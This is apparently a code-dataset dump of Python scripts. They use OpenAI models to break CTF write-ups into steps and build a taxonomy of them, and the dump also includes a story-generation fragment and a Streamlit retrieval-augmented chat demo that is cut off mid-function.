print("Querying GPT3..........................................")
completion1 = gpt3_completion(prompt)
#get story name
completion1="The story begins "+completion1
completion1 = completion1.replace(r'\n', '\n\n')
name=title+str(char)+".txt"
print("File title:"+name)
print(completion1)
#create scene breakdown
#folder = "planprompts/"
#filepath = os.path.join(folder, "synopsistoscenelist_multi.txt")
#with open(filepath, "r") as f:
# prompt8 = f.read()
#3 run the prompt
#scriptprompt= prompt8.replace('<<STORYTYPE>>', storytype).replace('<<SUPPORTINGFILES>>', supportingfiles).replace('<<TWEAK>>', tweak).replace('<<SYNOPSIS>>', completion1)
#print("QUERYING GPT3_____________________________________")
#completion8="frogspawn"
#completion8 = gpt3_completion(scriptprompt)
#completion8 = completion8.replace(r'\n', '\n')
#completion8="SCENE001:"+completion8
#print(completion8)
#save files
filepath = os.path.join(folder_location, "synopsis_"+name)
with open(filepath,"w",encoding="utf-8") as f:
f.write(completion1)
#filepath = os.path.join(folder_location, "story_breakdown_"+name)
#with open(filepath,"w",encoding="utf-8") as f:
# f.write(completion8)
#find character name and save detailed character
#call gpt3 again to create precis and save
| [
"<<STORYTYPE>>",
"<<SUPPORTINGFILES>>"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~02_data_processing~03_openai_generate_writeups_substeps.py | import json
import os
import re
import openai
def get_response(prompt: str):
response = openai.Completion.create(
model="text-davinci-003", # Replace with the latest GPT-3.5 model name
prompt=prompt,
max_tokens=1000,
)
return response.choices[0].text.strip() # Extract text from GPT-3.5 response
def find_steps_files_without_substeps():
steps_filepaths = []
for dirpath, dirnames, filenames in os.walk("../dataset_writeups"):
for filename in filenames:
if filename.endswith("_steps.json"):
steps_filepath = os.path.join(dirpath, filename)
substeps_filepath = steps_filepath.replace(
"_steps.json", "_substeps.json"
)
if not os.path.exists(substeps_filepath):
steps_filepaths.append(steps_filepath)
return steps_filepaths
def extract_json(s: str):
# Search for string patterns that look like JSON objects
for match in re.finditer(r"{[^}]*}", s):
substr = s[match.start() :]
# Try to load the substring as json, extending the substring until it succeeds or it's clear it's not json.
for end in range(len(substr), 0, -1):
try:
potential_json = json.loads(substr[:end])
# If it succeeds, return the valid json object.
return potential_json
except json.JSONDecodeError:
continue
return None # Return None if no valid JSON object is found.
if __name__ == "__main__":
with open("./api_keys.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompt_from_steps_to_substeps.txt", "r", encoding="utf-8"
) as f:
base_prompt = f.read()
try:
steps_filepaths = find_steps_files_without_substeps()
total_files = len(steps_filepaths)
for idx, step_filepath in enumerate(steps_filepaths, start=1):
with open(step_filepath, "r", encoding="utf-8") as writeup_file:
writeup = writeup_file.read()
prompt = base_prompt + "\n```" + writeup + "```"
print(f"[{idx}/{total_files}] Processing `{step_filepath}`")
try:
response_text = get_response(prompt=prompt)
# print(f"Response: {response_text}")
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
# Attempt to parse the JSON data
response_json_data = extract_json(response_text)
# Check if JSON is well-formed and complete
if response_json_data is not None:
try:
# Check if the structure contains the expected keys and values
steps_list = response_json_data.get("SubstepsModel", {}).get(
"Steps", []
)
if not steps_list:
raise ValueError("ERROR - JSON is missing 'Steps' list.")
for step in steps_list:
if "Substeps" not in step or not isinstance(
step["Substeps"], list
):
raise ValueError(
f"ERROR - Step {step.get('StepNumber')} does not contain a 'Substeps' list or 'Substeps' is not a list."
)
print("INFO - JSON appears to be well-formed and complete.")
steps_filepath = step_filepath.replace(
"_steps.json", "_substeps.json"
)
with open(steps_filepath, "w", encoding="utf-8") as steps_file:
json.dump(response_json_data, steps_file, indent=4)
print(f"Saved `{steps_filepath}`")
except ValueError as ve:
print(ve)
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDER\n```PLACEHOLDER```"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~07_openai_merge_taxonomies.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
# temperature=1.0,
stream=False,
)
return response.choices[0].message.content
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
def find_taxonomized_groups_files_without_merged():
taxonomized_groups_filepaths = []
search_dir = "../data/groups"
processed_ranges = []
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.endswith("_merged.json"):
groups_part = filename.split("_")[1].replace("_merged.json", "")
start_group, end_group = map(int, groups_part.split("-"))
processed_ranges.append(range(start_group, end_group + 1))
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.startswith("groups_") and filename.endswith(
"_taxonomized.json"
):
groups_part = filename.split("_")[1].replace("_taxonomized.json", "")
start_group, end_group = map(int, groups_part.split("-"))
in_processed_range = any(
start_group in processed_range and end_group in processed_range
for processed_range in processed_ranges
)
if not in_processed_range:
taxonomized_groups_filepath = os.path.join(dirpath, filename)
taxonomized_groups_filepaths.append(taxonomized_groups_filepath)
return taxonomized_groups_filepaths
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open("../prompts/04_prompt_merge_taxonomies.txt", "r", encoding="utf-8") as f:
prompt = f.read()
try:
taxonomized_groups_filepaths = find_taxonomized_groups_files_without_merged()
total_files = len(taxonomized_groups_filepaths)
idx = 0
while idx < total_files:
group_size = 2
if total_files - idx == 3:
group_size = 3
taxonomies = []
filepaths_to_merge = taxonomized_groups_filepaths[idx : idx + group_size]
for taxonomized_groups_filepath in filepaths_to_merge:
with open(taxonomized_groups_filepath, "r", encoding="utf-8") as f:
taxonomy = f.read()
taxonomies.append(taxonomy)
messages = [
{
"role": "user",
"content": prompt + "".join(taxonomies),
}
]
print(f"[{idx + 1}/{total_files}] Processing `{filepaths_to_merge}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
response_json_data = extract_json(response)
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
first_file = filepaths_to_merge[0]
last_file = filepaths_to_merge[-1]
first_file_number = first_file.split("_")[1].split("-")[0]
last_file_number = last_file.split("_")[1].split("-")[-1]
merged_taxonomized_filepath = f"../data/groups/groups_{first_file_number}-{last_file_number}_merged.json"
with open(merged_taxonomized_filepath, "w", encoding="utf-8") as f:
f.write(response)
print(f"Saved `{merged_taxonomized_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
idx += group_size
except KeyboardInterrupt:
print("Stop.")
| [] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~06_openai_taxonomize_groups.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
stream=False,
)
return response.choices[0].message.content
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
def find_substeps_groups_files_without_taxonomized():
substeps_groups_filepaths = []
search_dir = "../data/groups"
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if (
filename.startswith("groups_")
and filename.endswith(".json")
and not filename.endswith(
"_taxonomized.json"
) # Change the file extension here
):
substeps_groups_filepath = os.path.join(dirpath, filename)
taxonomized_substeps_filepath = substeps_groups_filepath.replace(
".json", "_taxonomized.json" # Change the file extension here
)
if not os.path.exists(taxonomized_substeps_filepath):
substeps_groups_filepaths.append(substeps_groups_filepath)
return substeps_groups_filepaths
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompts_taxonomy_development/02_prompt_taxonomize_substeps_groups.txt",
"r",
encoding="utf-8",
) as f:
prompt = f.read()
try:
substeps_groups_filepaths = find_substeps_groups_files_without_taxonomized()
total_files = len(substeps_groups_filepaths)
for idx, substeps_groups_filepath in enumerate(
substeps_groups_filepaths, start=1
):
with open(substeps_groups_filepath, "r", encoding="utf-8") as f:
substeps_groups_chunk = f.read()
messages = [
{
"role": "user",
"content": prompt + substeps_groups_chunk,
}
]
print(f"[{idx}/{total_files}] Processing `{substeps_groups_filepath}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
response_json_data = extract_json(response)
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
taxonomized_groups_filepath = substeps_groups_filepath.replace(
".json", "_taxonomized.json" # Change the file extension here
)
with open(taxonomized_groups_filepath, "w", encoding="utf-8") as f:
f.write(response)
print(f"Saved `{taxonomized_groups_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDERPLACEHOLDER"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~03_openai_group_substeps.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create( # https://platform.openai.com/docs/api-reference/chat/create
model="gpt-3.5-turbo", # The name of the OpenAI chatbot model to use
messages=messages,
# temperature=1.0,
stream=False,
)
return response.choices[0].message.content
def find_list_substeps_files_without_grouped():
list_substeps_filepaths = []
# Define the directory to search in
search_dir = "../data/list_substeps"
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
# Check if the filename starts with "list_substeps_"
# and ends with ".json" but not with "_grouped.json"
if (
filename.startswith("list_substeps_")
and filename.endswith("_abstracted.json")
and not filename.endswith("_grouped.json")
):
# Get the complete path of the current file
list_substeps_filepath = os.path.join(dirpath, filename)
# Formulate the path of the corresponding _grouped.json file
grouped_substeps_filepath = list_substeps_filepath.replace(
"_abstracted.json", "_grouped.json"
)
# Check if the _grouped.json file exists
if not os.path.exists(grouped_substeps_filepath):
list_substeps_filepaths.append(list_substeps_filepath)
return list_substeps_filepaths
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open("../prompts/02_prompt_group_substeps.txt", "r", encoding="utf-8") as f:
prompt = f.read()
try:
list_substeps_filepaths = find_list_substeps_files_without_grouped()
total_files = len(list_substeps_filepaths)
for idx, list_substeps_filepath in enumerate(list_substeps_filepaths, start=1):
with open(list_substeps_filepath, "r", encoding="utf-8") as f:
list_substeps_chunk = f.read()
messages = [
{
"role": "user",
"content": prompt + list_substeps_chunk,
}
]
print(f"[{idx}/{total_files}] Processing `{list_substeps_filepath}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
# Attempt to parse the JSON data
response_json_data = extract_json(response)
# Check if JSON is well-formed and complete
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
grouped_substeps_filepath = list_substeps_filepath.replace(
"_abstracted.json", "_grouped.json"
)
with open(grouped_substeps_filepath, "w", encoding="utf-8") as f:
json.dump(response_json_data, f, indent=4)
print(f"Saved `{grouped_substeps_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDERPLACEHOLDER"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~04_data_labelling~02_openai_labelling_substeps_tier1.py | import json
import os
import re
import openai
# Add the taxonomy_tier1 list
taxonomy_tier1_list = [
"Web Interaction and Navigation",
"Network and Communication Analysis",
"System Profiling and Analysis",
"Authentication and Authorization Management",
"Data Management",
"Cryptography and Encoding Management",
"Vulnerability and Exploitation Management",
"Database and File System Interaction",
"Tool Utilization and Scripting",
"Knowledge Management and Learning",
"Challenge and Strategy Management",
"Code Analysis and Debugging",
]
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
stream=False,
)
return response.choices[0].message.content
def find_substeps_files_without_tier1():
substeps_filepaths = []
for dirpath, _, filenames in os.walk("../data/dataset_writeups"):
for filename in filenames:
if (
"_substeps_" in filename
and filename.endswith(".json")
and not filename.endswith("_tier1.json")
and not filename.endswith("_tier2.json")
):
substeps_filepath = os.path.join(dirpath, filename)
tier1_filepath = substeps_filepath.replace(".json", "_tier1.json")
if not os.path.exists(tier1_filepath):
substeps_filepaths.append(substeps_filepath)
return substeps_filepaths
def extract_json(s: str):
for match in re.finditer(r"{[^}]*}", s):
substr = s[match.start() :]
for end in range(len(substr), 0, -1):
try:
potential_json = json.loads(substr[:end])
return potential_json
except json.JSONDecodeError:
continue
return None
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompt_tier1taxonomy_labelling_minimal.txt", "r", encoding="utf-8"
) as f:
taxonomy_requirements = f.read()
try:
substeps_filepaths = find_substeps_files_without_tier1()
total_files = len(substeps_filepaths)
for idx, substeps_filepath in enumerate(substeps_filepaths, start=1):
with open(substeps_filepath, "r", encoding="utf-8") as substeps_file:
substeps = substeps_file.read()
messages = [
{
"role": "user",
"content": taxonomy_requirements + substeps,
}
]
print(f"[{idx}/{total_files}] Processing `{substeps_filepath}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
response_json_data = extract_json(response)
if response_json_data is not None:
if all(
key in response_json_data
for key in ["StepNumber", "StepString", "Substeps"]
):
all_substeps_valid = True
for substep in response_json_data.get("Substeps", []):
all_fields_present = all(
key in substep
for key in [
"SubstepNumber",
"SubstepString",
"Tier1Taxonomy",
]
)
if not all_fields_present:
print(
f"ERROR - Substep {substep.get('SubstepNumber', 'Unknown')} is missing some fields."
)
all_substeps_valid = False
break
taxonomy_values_valid = (
substep.get("Tier1Taxonomy") in taxonomy_tier1_list
)
if not substep.get("Tier1Taxonomy"):
print(
f"ERROR - Substep {substep.get('SubstepNumber', 'Unknown')} is missing taxonomy fields."
)
all_substeps_valid = False
break
if not taxonomy_values_valid:
print(
f"ERROR - Substep {substep.get('SubstepNumber', 'Unknown')} has invalid taxonomy values. Main: {substep.get('Tier1Taxonomy')}."
)
all_substeps_valid = False
break
if all_substeps_valid:
print("INFO - JSON appears to be well-formed and complete.")
tier1_filepath = substeps_filepath.replace(
".json", "_tier1.json"
)
with open(tier1_filepath, "w", encoding="utf-8") as tier1_file:
json.dump(response_json_data, tier1_file, indent=4)
print(f"Saved `{tier1_filepath}`")
else:
print("ERROR - JSON is missing expected keys or values.")
else:
print("ERROR - JSON may be truncated or invalid.")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDERPLACEHOLDER"
] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~03_taxonomy_development~08_openai_remerge_taxonomies.py | import json
import os
import ast
import openai
def get_response(messages: list):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
# temperature=1.0,
stream=False,
)
return response.choices[0].message.content
def extract_json(response):
try:
return json.loads(response)
except json.JSONDecodeError:
try:
return ast.literal_eval(response)
except (ValueError, SyntaxError):
print(
"Error: The response string is neither valid JSON nor a Python dict-like string"
)
return None
def find_merged_groups_files_without_remerged():
merged_groups_filepaths = []
search_dir = "../data/groups"
processed_ranges = []
# Find all remerged file ranges
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.endswith("_remerged.json"):
groups_part = filename.split("_")[1].replace("_remerged.json", "")
start_group, end_group = map(int, groups_part.split("-"))
processed_ranges.append(range(start_group, end_group + 1))
# Find all merged files that don't have a corresponding remerged file
for dirpath, _, filenames in os.walk(search_dir):
for filename in filenames:
if filename.startswith("groups_") and filename.endswith("_merged.json"):
groups_part = filename.split("_")[1].replace("_merged.json", "")
start_group, end_group = map(int, groups_part.split("-"))
in_processed_range = any(
start_group in processed_range and end_group in processed_range
for processed_range in processed_ranges
)
if not in_processed_range:
merged_groups_filepath = os.path.join(dirpath, filename)
merged_groups_filepaths.append(merged_groups_filepath)
return merged_groups_filepaths
if __name__ == "__main__":
with open("../api_keys/api_key.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open("../prompts/05_prompt_final_merge.txt", "r", encoding="utf-8") as f:
prompt = f.read()
try:
merged_groups_filepaths = find_merged_groups_files_without_remerged()
total_files = len(merged_groups_filepaths)
idx = 0
while idx < total_files:
group_size = 2
if total_files - idx == 3:
group_size = 3
taxonomies = []
filepaths_to_merge = merged_groups_filepaths[idx : idx + group_size]
for merged_groups_filepath in filepaths_to_merge:
with open(merged_groups_filepath, "r", encoding="utf-8") as f:
taxonomy = f.read()
taxonomies.append(taxonomy)
messages = [
{
"role": "user",
"content": prompt + "".join(taxonomies),
}
]
print(f"[{idx + 1}/{total_files}] Processing `{filepaths_to_merge}`")
try:
response = get_response(messages=messages)
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
response_json_data = extract_json(response)
if response_json_data is not None:
print("INFO - JSON appears to be well-formed and complete.")
first_file = filepaths_to_merge[0]
last_file = filepaths_to_merge[-1]
first_file_number = first_file.split("_")[1].split("-")[0]
last_file_number = last_file.split("_")[1].split("-")[-1]
remerged_filepath = f"../data/groups/groups_{first_file_number}-{last_file_number}_remerged.json"
with open(remerged_filepath, "w", encoding="utf-8") as f:
f.write(response)
print(f"Saved `{remerged_filepath}`")
else:
print("ERROR - JSON may be truncated or invalid.")
idx += group_size
except KeyboardInterrupt:
print("Stop.")
| [] |
2024-01-10 | francescolonardo/CTF_writeups_NLP_analysis | openai_analysis~02_data_processing~01_openai_generate_writeups_presteps.py | import json
import os
import re
import ast
import openai
def get_response(prompt: str):
response = openai.Completion.create(
model="text-davinci-003", # Replace with the latest GPT-3.5 model name
prompt=prompt,
max_tokens=1000,
)
return response.choices[0].text.strip() # Extract text from GPT-3.5 response
def extract_list_from_response(response_text):
# Use regex to find a list in the response
match = re.search(r"\[\s*\"[^\[\]]*\"\s*(,\s*\"[^\[\]]*\"\s*)*\]", response_text)
if match:
list_str = match.group(0)
try:
return ast.literal_eval(list_str)
except (ValueError, SyntaxError):
print("Error in converting string to list.")
return None
else:
print("No list found in the response.")
return None
def find_original_files_without_presteps():
original_filepaths = []
for dirpath, _, filenames in os.walk("../dataset_writeups"):
for filename in filenames:
if filename.endswith("_original.md"):
original_filepath = os.path.join(dirpath, filename)
presteps_filepath = original_filepath.replace(
"_original.md", "_presteps.json"
)
if not os.path.exists(presteps_filepath):
original_filepaths.append(original_filepath)
return original_filepaths
if __name__ == "__main__":
with open("./api_keys.json", "r", encoding="utf-8") as f:
api_key = json.load(f)["api_key"]
openai.api_key = api_key
with open(
"../prompts/prompt_from_original_to_presteps.txt", "r", encoding="utf-8"
) as f:
base_prompt = f.read()
try:
original_filepaths = find_original_files_without_presteps()
total_files = len(original_filepaths)
for idx, original_filepath in enumerate(original_filepaths, start=1):
with open(original_filepath, "r", encoding="utf-8") as writeup_file:
writeup = writeup_file.read()
prompt = base_prompt + "\n```" + writeup + "```"
print(f"[{idx}/{total_files}] Processing `{original_filepath}`")
try:
response_text = get_response(prompt=prompt)
# print(f"Response: {response_text}")
# First try to parse as JSON
try:
response_json_data = json.loads(response_text)
except json.JSONDecodeError:
response_json_data = None
# If not JSON, try extracting list using regex and ast.literal_eval
if response_json_data is None:
response_json_data = extract_list_from_response(response_text)
if response_json_data is not None:
print("INFO - Data appears to be well-formed and complete.")
presteps_filepath = original_filepath.replace(
"_original.md", "_presteps.json"
)
with open(
presteps_filepath, "w", encoding="utf-8"
) as presteps_file:
json.dump(response_json_data, presteps_file, indent=4)
print(f"Saved `{presteps_filepath}`")
else:
print("ERROR - Could not extract valid data from the response")
except openai.error.InvalidRequestError as e:
print(f"ERROR - OpenAI - {e}")
except KeyboardInterrupt:
print("Stop.")
| [
"PLACEHOLDER\n```PLACEHOLDER```"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | app-agent.py | import streamlit as st
from langchain.agents import initialize_agent, AgentType
from langchain.callbacks import StreamlitCallbackHandler
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate, MessagesPlaceholder
from llm_helper import get_agent_chain, get_lc_oai_tools
with st.sidebar:
openai_api_key = st.secrets["OPENAI_API_KEY"]
"[Get an OpenAI API key](https://platform.openai.com/account/api-keys)"
"[View the source code](https://github.com/streamlit/llm-examples/blob/main/pages/2_Chat_with_search.py)"
"[](https://codespaces.new/streamlit/llm-examples?quickstart=1)"
st.title("🔎 LangChain - Chat with search")
"""
In this example, we're using `StreamlitCallbackHandler` to display the thoughts and actions of an agent in an interactive Streamlit app.
Try more LangChain 🤝 Streamlit Agent examples at [github.com/langchain-ai/streamlit-agent](https://github.com/langchain-ai/streamlit-agent).
"""
if "messages" not in st.session_state:
st.session_state["messages"] = [
{"role": "assistant", "content": "Hi, I'm a chatbot who can search the web. How can I help you?"}
]
for msg in st.session_state.messages:
st.chat_message(msg["role"]).write(msg["content"])
if prompt := st.chat_input(placeholder="Who won the Women's U.S. Open in 2018?"):
st.session_state.messages.append({"role": "user", "content": prompt})
st.chat_message("user").write(prompt)
if not openai_api_key:
st.info("Please add your OpenAI API key to continue.")
st.stop()
llm = ChatOpenAI(model_name="gpt-3.5-turbo-1106", openai_api_key=openai_api_key, streaming=True)
lc_tools, _ = get_lc_oai_tools()
search_agent = initialize_agent(lc_tools, llm, agent=AgentType.OPENAI_FUNCTIONS, handle_parsing_errors=True, verbose=True)
agent_prompt = ChatPromptTemplate.from_messages(
[
("system", "You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document. Always use the content from the source document to answer the user's question. If you need to compare multiple subjects, search them one by one."),
("user", "{input}"),
MessagesPlaceholder(variable_name="agent_scratchpad"),
]
)
search_agent.agent.prompt = agent_prompt
with st.chat_message("assistant"):
st_cb = StreamlitCallbackHandler(st.container(), expand_new_thoughts=False)
response = search_agent.run(prompt, callbacks=[st_cb])
# search_agent = get_agent_chain(callbacks=[st_cb])
# response = search_agent.invoke({"input": prompt})
# response = response["output"]
st.session_state.messages.append({"role": "assistant", "content": response})
st.write(response)
| [
"You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document. Always use the content from the source document to answer the user's question. If you need to compare multiple subjects, search them one by one.",
"agent_scratchpad",
"Hi, I'm a chatbot who can search the web. How can I help you?",
"{input}"
] |
2024-01-10 | nimamahmoudi/LLMStreamlitDemoBasic | llm_helper.py | from typing import Optional
# langchain imports
from langchain.chat_models import ChatOpenAI
from langchain.schema.runnable import RunnableMap
from langchain.prompts.prompt import PromptTemplate
from langchain.prompts import ChatPromptTemplate
from langchain.schema.runnable import RunnablePassthrough
from langchain.schema.output_parser import StrOutputParser
from operator import itemgetter
from langchain.schema.messages import HumanMessage, SystemMessage, AIMessage
from langchain.callbacks.streamlit.streamlit_callback_handler import StreamlitCallbackHandler
def format_docs(docs):
res = ""
# res = str(docs)
for doc in docs:
escaped_page_content = doc.page_content.replace("\n", "\\n")
res += "<doc>\n"
res += f" <content>{escaped_page_content}</content>\n"
for m in doc.metadata:
res += f" <{m}>{doc.metadata[m]}</{m}>\n"
res += "</doc>\n"
return res
def get_search_index(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index"):
# load embeddings
from langchain.vectorstores import FAISS
from langchain.embeddings.openai import OpenAIEmbeddings
search_index = FAISS.load_local(
folder_path=index_folder,
index_name=file_name + ".index",
embeddings=OpenAIEmbeddings(),
)
return search_index
def convert_message(m):
if m["role"] == "user":
return HumanMessage(content=m["content"])
elif m["role"] == "assistant":
return AIMessage(content=m["content"])
elif m["role"] == "system":
return SystemMessage(content=m["content"])
else:
raise ValueError(f"Unknown role {m['role']}")
_condense_template = """Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question, in its original language.
Chat History:
{chat_history}
Follow Up Input: {input}
Standalone question:"""
CONDENSE_QUESTION_PROMPT = PromptTemplate.from_template(_condense_template)
_rag_template = """Answer the question based only on the following context, citing the page number(s) of the document(s) you used to answer the question:
{context}
Question: {question}
"""
ANSWER_PROMPT = ChatPromptTemplate.from_template(_rag_template)
def _format_chat_history(chat_history):
def format_single_chat_message(m):
if type(m) is HumanMessage:
return "Human: " + m.content
elif type(m) is AIMessage:
return "Assistant: " + m.content
elif type(m) is SystemMessage:
return "System: " + m.content
else:
raise ValueError(f"Unknown role {m['role']}")
return "\n".join([format_single_chat_message(m) for m in chat_history])
def get_standalone_question_from_chat_history_chain():
_inputs = RunnableMap(
standalone_question=RunnablePassthrough.assign(
chat_history=lambda x: _format_chat_history(x["chat_history"])
)
| CONDENSE_QUESTION_PROMPT
| ChatOpenAI(temperature=0)
| StrOutputParser(),
)
return _inputs
def get_rag_chain(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index", retrieval_cb=None):
vectorstore = get_search_index(file_name, index_folder)
retriever = vectorstore.as_retriever()
if retrieval_cb is None:
retrieval_cb = lambda x: x
def context_update_fn(q):
retrieval_cb([q])
return q
_inputs = RunnableMap(
standalone_question=RunnablePassthrough.assign(
chat_history=lambda x: _format_chat_history(x["chat_history"])
)
| CONDENSE_QUESTION_PROMPT
| ChatOpenAI(temperature=0)
| StrOutputParser(),
)
_context = {
"context": itemgetter("standalone_question") | RunnablePassthrough(context_update_fn) | retriever | format_docs,
"question": lambda x: x["standalone_question"],
}
conversational_qa_chain = _inputs | _context | ANSWER_PROMPT | ChatOpenAI()
return conversational_qa_chain
# RAG fusion chain
# source1: https://youtu.be/GchC5WxeXGc?si=6i7J0rPZI7SNwFYZ
# source2: https://towardsdatascience.com/forget-rag-the-future-is-rag-fusion-1147298d8ad1
def reciprocal_rank_fusion(results: list[list], k=60):
from langchain.load import dumps, loads
fused_scores = {}
for docs in results:
# Assumes the docs are returned in sorted order of relevance
for rank, doc in enumerate(docs):
doc_str = dumps(doc)
if doc_str not in fused_scores:
fused_scores[doc_str] = 0
fused_scores[doc_str] += 1 / (rank + k)
reranked_results = [
(loads(doc), score)
for doc, score in sorted(fused_scores.items(), key=lambda x: x[1], reverse=True)
]
return reranked_results
def get_search_query_generation_chain():
from langchain.prompts import SystemMessagePromptTemplate, HumanMessagePromptTemplate
prompt = ChatPromptTemplate(
input_variables=['original_query'],
messages=[
SystemMessagePromptTemplate(
prompt=PromptTemplate(
input_variables=[],
template='You are a helpful assistant that generates multiple search queries based on a single input query.'
)
),
HumanMessagePromptTemplate(
prompt=PromptTemplate(
input_variables=['original_query'],
template='Generate multiple search queries related to: {original_query} \n OUTPUT (4 queries):'
)
)
]
)
generate_queries = (
prompt |
ChatOpenAI(temperature=0) |
StrOutputParser() |
(lambda x: x.split("\n"))
)
return generate_queries
def get_rag_fusion_chain(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index", retrieval_cb=None):
vectorstore = get_search_index(file_name, index_folder)
retriever = vectorstore.as_retriever()
query_generation_chain = get_search_query_generation_chain()
_inputs = RunnableMap(
standalone_question=RunnablePassthrough.assign(
chat_history=lambda x: _format_chat_history(x["chat_history"])
)
| CONDENSE_QUESTION_PROMPT
| ChatOpenAI(temperature=0)
| StrOutputParser(),
)
if retrieval_cb is None:
retrieval_cb = lambda x: x
_context = {
"context":
RunnablePassthrough.assign(
original_query=lambda x: x["standalone_question"]
)
| query_generation_chain
| retrieval_cb
| retriever.map()
| reciprocal_rank_fusion
| (lambda x: [item[0] for item in x])
| format_docs,
"question": lambda x: x["standalone_question"],
}
conversational_qa_chain = _inputs | _context | ANSWER_PROMPT | ChatOpenAI()
return conversational_qa_chain
####################
# Adding agent chain with OpenAI function calling
def get_search_tool_from_index(search_index, st_cb: Optional[StreamlitCallbackHandler] = None, ):
from langchain.agents import tool
from agent_helper import retry_and_streamlit_callback
@tool
@retry_and_streamlit_callback(st_cb=st_cb, tool_name="Content Seach Tool")
def search(query: str) -> str:
"""Search the contents of the source document for the queries."""
docs = search_index.similarity_search(query, k=5)
return format_docs(docs)
return search
def get_lc_oai_tools(file_name:str = "Mahmoudi_Nima_202202_PhD.pdf", index_folder: str = "index", st_cb: Optional[StreamlitCallbackHandler] = None, ):
from langchain.tools.render import format_tool_to_openai_tool
search_index = get_search_index(file_name, index_folder)
lc_tools = [get_search_tool_from_index(search_index=search_index, st_cb=st_cb)]
oai_tools = [format_tool_to_openai_tool(t) for t in lc_tools]
return lc_tools, oai_tools
def get_agent_chain(file_name="Mahmoudi_Nima_202202_PhD.pdf", index_folder="index", callbacks=None, st_cb: Optional[StreamlitCallbackHandler] = None, ):
if callbacks is None:
callbacks = []
from langchain.agents import initialize_agent, AgentType
from langchain.prompts import ChatPromptTemplate, MessagesPlaceholder
from langchain.agents.format_scratchpad.openai_tools import (
format_to_openai_tool_messages,
)
from langchain.agents import AgentExecutor
from langchain.agents.output_parsers.openai_tools import OpenAIToolsAgentOutputParser
lc_tools, oai_tools = get_lc_oai_tools(file_name, index_folder, st_cb)
prompt = ChatPromptTemplate.from_messages(
[
("system", "You are a helpful assistant, use the search tool to answer the user's question and cite only the page number when you use information coming (like [p1]) from the source document.\nchat history: {chat_history}"),
("user", "{input}"),
MessagesPlaceholder(variable_name="agent_scratchpad"),
]
)
llm = ChatOpenAI(temperature=0, model="gpt-3.5-turbo-1106")
agent = (
{
